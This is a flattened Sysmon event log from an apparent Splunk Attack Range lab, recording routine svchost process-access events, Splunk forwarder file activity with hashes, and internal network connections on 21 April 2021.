19:17:52.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094998Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:53.859{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0A97A80C4BB9F5326928A2BC2DF254,SHA256=704943502CBB9AE27486AE5514E58F40E23BD4AC8895B3C9CA459B498D0D158B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606018Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:53.555{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606017Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:53.555{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7DFCBA745DD7BC4DEE4C2898FCAEE5,SHA256=008DD4107E1ADDD721C9D545C8D42A6FC4EC7B9A57B407FECABD116A8FC94791falsefalse - insufficient disk space 10341000x80000000000000001094997Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:53.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094996Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:53.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095001Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.866{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F482ECB3BCA75DDBA99F40E55EEDEBE8,SHA256=984A6BF29DCF2A8920BBFE5B746558131215CD7546D9E30E1A7BECFD42E2F920,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606025Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.736{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49725-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606024Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.573{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606023Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.573{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD614B053B905256DF5C5231A07DBC74,SHA256=C55B1AEEE40E1DCA786D2CD61FFA15AA15BC526344717EC4345B68101C711438falsefalse - insufficient disk space 10341000x80000000000000001095000Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094999Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606022Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606021Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC19776DBBFBEFBB7462F264E840555F,SHA256=4C6E1C0BE8DE741E501D674008AE53269F107398233C10BA7FF9C09FAD7D82BFfalsefalse - insufficient disk space 11241100x80000000000000001606020Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606019Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04A571D93215048A0C0817A02C760FC5,SHA256=49F3FA4BCABB170092CE7B8F8DA4641FA1293A0D44A0531748D74E417490FA7Dfalsefalse - insufficient disk space 23542300x80000000000000001095004Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:55.868{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8457217EDAF3075B8F0D7AD63EC845F3,SHA256=A459A7A5891A7341F7607C26A971EA29705051C44B51E89E26D65611165D5144,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001606030Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606029Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606028Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606027Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.575{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606026Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.575{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F39F42985207D35D96F837014FEA1BE,SHA256=CAC87A84A57A6BCAB6A3758804B1513B5C5695A34FBBDEC722E5C69AE0F4555Afalsefalse - insufficient disk space 10341000x80000000000000001095003Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:55.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095002Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:55.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095007Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.870{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007BF601F1CF9FE5CCA3A1475F4CB281,SHA256=7F59BB226CD04396B14FE0555A62EF02D249DBE17429C1F5043F410493A5BEEE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606032Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:56.594{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606031Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:56.594{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99C05147812FA536F4493482CA5DCE6D,SHA256=190316E3E8A5D8A4981550C30AA0DC124149E66632E4AD9D1719D878EBDFE3D2falsefalse - insufficient disk space 10341000x80000000000000001095006Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095005Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095013Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.877{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76962B9B3D0E401276AC0783049622A3,SHA256=3BC130B26DEFEB223043822EC917C3DDDF6F3228AF406A1EA272E4E60BD0D6C8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606034Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:57.665{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606033Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:57.665{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FDCC4FAFAA591C52BD9D36DC0B5A3FF,SHA256=A386A8A68F9509FB32609605539D3E53167E180961D62455ADD7AF8E7C36349Cfalsefalse - insufficient disk space 354300x80000000000000001095012Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.738{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1141-false10.0.1.12-8000- 10341000x80000000000000001095011Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095010Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095009Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.191{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=991BBADCB91968A3B3C85363605EC044,SHA256=213BAC42A49CC6E7324FE50CA83DFB9D037A0B44A3BB67960D5822CA75568424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095008Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.190{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B69CFC5E8A04AB91CC8B2EEFC852DFC9,SHA256=35423A014A478DD525555B1194E0C858EC5CAA95BD6D4A1C90DB7C4433A3BF4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095016Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.881{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072F33218BFF7EA7C56A64508D6F60A1,SHA256=8AC848BEAE3A24C07B0D288F494D69ABC19E3A15C6FB439A0498223E400C8C56,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606036Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.667{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606035Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.667{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D60EAA46DC1E49AED376FD4D8BA82475,SHA256=003330C69475C6F75360E3D4DFA9C066208FF63232E926492EFAA3E84E171A13falsefalse - insufficient disk space 10341000x80000000000000001095015Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095014Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606038Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:59.839{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606037Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:59.839{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE468C88F74067E8053B53EEC0D032E,SHA256=FDF8700D3BD5142A32FA3AD598718CE5E807609BCFE1D0A629A8031024D2C79Dfalsefalse - insufficient disk space 23542300x80000000000000001095019Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:59.895{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFFAE5DB97DA22C50A53604A600AC0B,SHA256=EB2AC29643C33F959A87ACF74283EB2AEA4E7AF06EF108C904788D60ED4F7A63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095018Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 